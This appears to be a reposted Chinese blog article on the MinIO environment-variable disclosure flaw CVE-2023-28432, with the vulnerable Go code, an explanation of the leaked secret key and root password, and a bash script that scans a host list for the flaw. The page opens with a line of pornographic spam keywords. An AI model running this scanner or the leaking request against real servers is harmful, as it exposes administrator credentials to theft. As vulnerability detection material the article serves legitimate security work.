国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC

這篇具有很好參考價(jià)值的文章主要介紹了MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。


吸取上次復(fù)現(xiàn)漏洞的教訓(xùn)……

概述

MinIO 是一種開源對(duì)象存儲(chǔ)服務(wù),與 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一種高性能、高可用的分布式存儲(chǔ)系統(tǒng),可以存儲(chǔ)大量數(shù)據(jù),并提供高速的數(shù)據(jù)讀寫能力。MinIO采用分布式架構(gòu),可以在多個(gè)節(jié)點(diǎn)上運(yùn)行,實(shí)現(xiàn)數(shù)據(jù)的分布式存儲(chǔ)和處理。
在集群部署的Minio中,未授權(quán)的攻擊者可發(fā)送惡意的HTTP請(qǐng)求來獲取Minio環(huán)境變量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能導(dǎo)致攻擊者以管理員權(quán)限登錄Minio。

影響范圍

漏洞利用的前提是使用分布式部署
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

相關(guān)漏洞代碼

// minio/cmd/bootstrap-peer-server.go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
  ctx := newContext(r, w, "VerifyHandler")
  cfg := getServerSystemCfg()
  logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}
 
// minio/cmd/bootstrap-peer-server.go
func getServerSystemCfg() ServerSystemConfig {
  envs := env.List("MINIO_")
  envValues := make(map[string]string, len(envs))
  for _, envK := range envs {
    // skip certain environment variables as part
    // of the whitelist and could be configured
    // differently on each nodes, update skipEnvs()
    // map if there are such environment values
    if _, ok := skipEnvs[envK]; ok {
      continue
    }
    envValues[envK] = env.Get(envK, "")
  }
  return ServerSystemConfig{
    MinioEndpoints: globalEndpoints,
    MinioEnv:       envValues,
  }
}

VerifyHandler 函數(shù)中調(diào)用了 getServerSystemCfg() 函數(shù),該函數(shù)返回了 ServerSystemConfig 結(jié)構(gòu)體,其中包含了環(huán)境變量 MINIO_ 的鍵值對(duì)。由于環(huán)境變量是全局可見的,因此會(huì)將賬號(hào)打印出來 。為什么環(huán)境變量中會(huì)包含賬號(hào)密碼信息呢?因?yàn)楦鶕?jù)官方的啟動(dòng)說明,在MinIO在啟動(dòng)時(shí)會(huì)從環(huán)境變量中讀取用戶預(yù)設(shè)的管理員賬號(hào)和密碼,如果省略則默認(rèn)賬號(hào)密碼為minioadmin/minioadmin。

POC

批量檢測(cè)POC,bash腳本,注意賦權(quán)

#!/bin/bash
# Author : whgojp
# Enable colors
GREEN='\033[0;32m'
NC='\033[0m'

count=0

while read -r line; do
  ((count++))

  response=$(curl -s -XPOST "$line/minio/bootstrap/v1/verify -k" --connect-timeout 3)	#修改一下 這里加了-k 忽略對(duì) SSL 證書驗(yàn)證
  if echo "$response" | grep -q "MinioEnv"; then		#匹配關(guān)鍵詞
    printf "${GREEN}[!] ${line}${NC}:is Vulnerable?。?!\n"
    echo "$line" >> result.txt
  else
    printf "[+] (${count}/$(wc -l < MinIO.txt)) Scanning: ${line}\n"
  fi
done < MinIO.txt

MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC
當(dāng)然還有其他版本批量檢測(cè)POC
CVE-2023-28432 nuclei templates
https://github.com/MzzdToT/CVE-2023-28432/blob/main/minio.py

檢測(cè)效果;
MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC
手動(dòng)檢測(cè):
MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POCMinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC
Burp手動(dòng)測(cè)試的時(shí)候記得改POST發(fā)包

使用Goby紅隊(duì)版可以直接檢測(cè)該漏洞

參考

https://aq.mk/index.php/archives/142.html
https://www.gksec.com/MinIO_RCE.html
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q文章來源地址http://www.zghlxwxcb.cn/news/detail-419281.html

到了這里,關(guān)于MinIO信息泄露漏洞(CVE-2023-28432)批量檢測(cè)POC的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby預(yù)置了最具攻擊效果的漏洞引擎,覆蓋Weblogic,Tomcat等最嚴(yán)重漏洞。每天從互聯(lián)網(wǎng)(如CVE)會(huì)產(chǎn)生大量的漏洞信息,我們篩選了會(huì)被用于真實(shí)攻擊的漏洞進(jìn)行每日更新。Goby也提供了可以自定義的漏洞檢查框架,發(fā)動(dòng)了互聯(lián)網(wǎng)的大量安全從業(yè)者貢獻(xiàn)POC,保證持續(xù)的應(yīng)急響應(yīng)能

    2024年02月15日
    瀏覽(26)
  • MinIO 環(huán)境變量泄漏漏洞(CVE-2023-28432)

    MinIO 環(huán)境變量泄漏漏洞(CVE-2023-28432)

    MinIO 是一個(gè)開源的對(duì)象存儲(chǔ)服務(wù)器。 MinIO RELEASE.2023-03-20T20-16-18Z之前版本中的 bootstrap-peer-server.go#VerifyHandler 方法存在敏感信息泄漏漏洞,攻擊者可向集群部署中的 MinIO 服務(wù)器的 /minio/bootstrap/v1/verify API發(fā)送POST請(qǐng)求,從而獲取到 MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD 等所有環(huán)境變量信

    2023年04月26日
    瀏覽(42)
  • Apache Tomcat 信息泄露漏洞CVE-2023-28708處理

    Apache Tomcat 信息泄露漏洞CVE-2023-28708處理

    Apache Tomcat軟件是Jakarta Servlet、 Jakarta Server Pages、 Jakarta Expression Language、 Jakarta WebSocket、 Jakarta Annotations和 Jakarta Authentication 規(guī)范的開源實(shí)現(xiàn) 。Apache Tomcat實(shí)現(xiàn)了對(duì)Servlet和JavaServer Page(JSP)的支持,并提供了作為Web服務(wù)器的一些特有功能,如Tomcat管理和控制平臺(tái)、安全域管理和

    2024年02月16日
    瀏覽(16)
  • 致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)

    致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)

    產(chǎn)品系列: A3、A6、A8 品牌: 用友 對(duì)象: 微型、小型企業(yè)、企業(yè)部門級(jí) 漏洞描述 致遠(yuǎn)OA A8-m 存在狀態(tài)監(jiān)控頁面信息泄露,攻擊者可以從其中獲取網(wǎng)站路徑和用戶名等敏感信息進(jìn)一步攻擊 漏洞影響 致遠(yuǎn)OA A8-m 網(wǎng)絡(luò)測(cè)繪 title=“A8-m” 漏洞復(fù)現(xiàn) 訪問監(jiān)控頁面 /seeyon/management/status.jsp 后

    2024年02月02日
    瀏覽(35)
  • Apache Tomcat 最新信息泄露漏洞CVE-2023-28708詳情及解決方案,springboot版本的對(duì)應(yīng)的內(nèi)嵌tomcat版本查看,tomcat相關(guān)。

    CVE - CVE-2023-28708 (mitre.org) NVD - CVE-2023-28708 (nist.gov) CVE-2023-28708 site:tomcat.apache.org - Google Search 當(dāng)將 RemoteIpFilter 與通過 HTTP 從反向代理接收的請(qǐng)求一起使用時(shí),包括設(shè)置為 https 的 X-Forwarded-Proto 標(biāo)頭,由 Apache Tomcat 11.0.0-M1 到 11.0.0.-M2、10.1.0-M1 到 10.1.5、9.0.0-M1 到 9.0.71 和 8.5.0 到 8

    2024年02月13日
    瀏覽(31)
  • ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解決辦法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解決辦法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031) 漏洞解決辦法 ? ? ? ? ? ?

    2024年02月12日
    瀏覽(22)
  • 漏洞修復(fù)---SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    1.查看當(dāng)前openssl版本 ? ? ? 我線上版本是?? OpenSSL 1.0.2k-fips?26?Jan?2017 ?官網(wǎng)下載最新版本 【當(dāng)前我下載的版本為 openssl-1.1.1q】 2.將壓縮包上傳到linux服務(wù)器 ? ? tar -zxvf?openssl-1.1.1q.tar.gz 3.編譯安裝 4.?移除老版本openssl 5. 查看版本 openssl version 報(bào)錯(cuò)? ? openssl: error while loadi

    2024年02月16日
    瀏覽(24)
  • 解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    錯(cuò)誤詳情: 解決方案 ?win2012R2解決辦法 參考鏈接:Browse code samples | Microsoft Learn 下載該ps1的文件。 下載該ps1的文件。 首先運(yùn)行PowerShell后去文件夾中運(yùn)行,或者直接輸入 D:Solve-Sweet32.ps1 即可 參考鏈接? SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)解決辦法(WindowsServer2012r2 3389端口 )

    2024年02月12日
    瀏覽(24)
  • SSL/TLS 協(xié)議信息泄露漏洞(CVE-2016-2183)【原理掃描】

    SSL/TLS 協(xié)議信息泄露漏洞(CVE-2016-2183)【原理掃描】

    SSL/TLS協(xié)議 RC4信息泄露漏洞被掃描出來,一般出現(xiàn)的問題在ssh和https服務(wù)上使用了DES、3DES算法,禁用這些算法就好了 1.使用nmap掃描出來: nmap -sV --script ssl-enum-ciphers -p 443 ip 2.使用綠盟掃描 顯示CVE-2016-2183漏洞 apache: 1.禁止apache服務(wù)器使用RC4加密算法 2.重啟apache服務(wù) Nginx: 1.禁止

    2024年02月09日
    瀏覽(37)
  • 服務(wù)器漏洞修復(fù)之SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    風(fēng)險(xiǎn)描述 遠(yuǎn)程主機(jī)支持在一個(gè)或多個(gè)密碼套件中使用 64 位塊的塊密碼。由于使用弱 64 位塊密碼,因而會(huì)受到一個(gè)稱為 SWEET32 的漏洞影響。具有足夠資源的中間人攻擊者可利用此漏洞,通過“birthday”攻擊檢測(cè)會(huì)在固定密碼與已知純文本之間泄露 XOR 的沖突,進(jìn)而泄露密碼文本(例

    2024年02月16日
    瀏覽(35)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包